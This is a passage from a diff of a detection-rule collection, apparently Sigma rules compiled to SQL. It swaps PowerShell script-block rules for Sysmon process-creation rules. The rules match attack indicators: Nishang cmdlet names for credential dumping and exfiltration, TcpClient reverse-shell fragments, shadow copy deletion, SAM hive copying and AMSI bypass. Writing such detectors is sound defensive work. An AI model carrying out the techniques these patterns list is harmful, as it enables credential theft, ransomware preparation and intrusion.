ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" ], - "filename": "posh_ps_clear_powershell_history.yml" + "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" }, { - "title": "Malicious Nishang PowerShell Commandlets", - "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "title": "Execution of Suspicious File Type Extension", + "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "status": "experimental", - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "author": "Alec Costello", + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
(EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (NOT ((Image LIKE '%.exe' ESCAPE '\\' OR Image LIKE '%.tmp' ESCAPE '\\' OR Image LIKE '%.scr' ESCAPE '\\')) AND NOT ((Image IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (Image LIKE '%.rbf' ESCAPE '\\' OR Image LIKE '%.rbs' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\'))) AND NOT ((Image IN ('-', '')) OR (Image = '') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR (Image LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND Image LIKE '%.dat' ESCAPE '\\') OR (Image LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%.tmp%' ESCAPE '\\' AND Image LIKE '%CodeSetup%' ESCAPE '\\') OR (Image LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND Image LIKE '%.ngn' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files 
(x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\$Extend\\\\$Deleted\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeC2RClient.exe%' ESCAPE '\\' AND CommandLine LIKE '%/update UPDATEORCHESTRATOR displaylevel=False%' ESCAPE '\\')))" ], - "filename": "posh_ps_nishang_malicious_commandlets.yml" + "filename": "proc_creation_win_susp_non_exe_image.yml" }, { - "title": "Suspicious Hyper-V Cmdlets", - "id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "title": "New Kernel Driver Via SC.EXE", + "id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", "status": "experimental", - "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", - "author": "frack113", + "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.006" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Rare legitimate installation of kernel drivers via sc.exe" ], "level": 
"medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%New-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-VMFirmware%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-VM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND (CommandLine LIKE '%create%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\') AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND CommandLine LIKE '%type%' ESCAPE '\\' AND CommandLine LIKE '%kernel%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_hyper_v_condlet.yml" + "filename": "proc_creation_win_sc_new_kernel_driver.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - PsScript", - "id": "9e620995-f2d8-4630-8430-4afd89f77604", + "title": "Execution Of Non-Existing File", + "id": "71158e3f-df67-472b-930e-7d287acaa3e1", "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. 
Which is often used by attackers to perform AD enumeration.", - "author": "frack113, Nasreddine Bencherchali", + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Import-Module %' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\') OR ScriptBlockText LIKE '%ipmo Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT (Image LIKE '%\\\\%' ESCAPE '\\') AND NOT ((Image = '') OR (Image IN ('-', '')) OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" ], - "filename": "posh_ps_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_susp_image_missing.yml" }, { - "title": "Live Memory Dump Using Powershell", - "id": "cd185561-4760-45d6-a63e-a51325112cae", - "status": "test", - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "author": "Max Altgelt (Nextron Systems)", + "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", + "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "status": "experimental", + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "author": "Florian Roth 
(Nextron Systems)", "tags": [ - "attack.t1003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Diagnostics" + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" }, { - "title": "WMImplant Hack Tool", - "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "title": "Code Execution via Pcwutl.dll", + "id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", "status": "test", - "description": "Detects parameters used by WMImplant", - "author": "NVISO", + "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Administrative scripts that use the same keywords." 
+ "Use of Program Compatibility Troubleshooter Helper" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%pcwutl%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\'))" ], - "filename": "posh_ps_wmimplant.yml" + "filename": "proc_creation_win_lolbin_pcwutl.yml" }, { - "title": "Disable-WindowsOptionalFeature Command PowerShell", - "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "title": "Suspicious DLL Loaded via CertOC.EXE", + "id": "84232095-ecca-4015-b0d7-7726507ee793", "status": "experimental", - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and 
Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_disable_windows_optional_feature.yml" + "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" }, { - "title": "Detected Windows Software Discovery - PowerShell", - "id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", - "status": "experimental", - "description": 
"Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "author": "Nikita Nazarov, oscd.community", + "title": "PowerShell SAM Copy", + "id": "1af57a4b-460a-4738-9034-db68b880c665", + "status": "test", + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1518" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Legitimate administration activities" + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_sam_access.yml" + }, + { + "title": "Suspicious SYSVOL Domain Group Policy Access", + "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", + "status": "test", + "description": "Detects Access to Domain Group Policies stored in SYSVOL", + "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ], + "falsepositives": [ + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-itemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\software\\\\%' ESCAPE '\\' AND ScriptBlockText 
LIKE '%select-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%format-table%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\SYSVOL\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\policies\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_software_discovery.yml" + "filename": "proc_creation_win_susp_sysvol_access.yml" }, { - "title": "Suspicious New-PSDrive to Admin Share", - "id": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "title": "DriverQuery.EXE Execution", + "id": "a20def93-0709-4eae-9bd2-31206e21e6b2", "status": "experimental", - "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "description": "Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.discovery" ], "falsepositives": [ - "Unknown" + "Legitimate use by third party tools in order to investigate installed drivers" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSDrive%' ESCAPE '\\' AND ScriptBlockText LIKE '%-psprovider %' ESCAPE '\\' AND ScriptBlockText LIKE '%filesystem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-root %' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND ScriptBlockText LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe'))" ], - "filename": "posh_ps_susp_new_psdrive.yml" + "filename": "proc_creation_win_driverquery_usage.yml" }, { - "title": "Delete Volume 
Shadow Copies via WMI with PowerShell - PS Script", - "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "status": "test", - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "frack113", + "title": "Potential Powershell ReverseShell Connection", + "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "status": "stable", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", + "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "In rare administrative cases, this function might be used to check network connectivity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetStream(%' ESCAPE '\\' AND CommandLine LIKE '%.Write(%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_win32_shadowcopy.yml" + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific", - "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", - "status": "experimental", - "description": "Detects 
suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "Fsutil Suspicious Invocation", + "id": "add64136-62e5-48ea-807e-88638d02df1e", + "status": "stable", + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "author": "Ecco, E.M. Anhaus, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' 
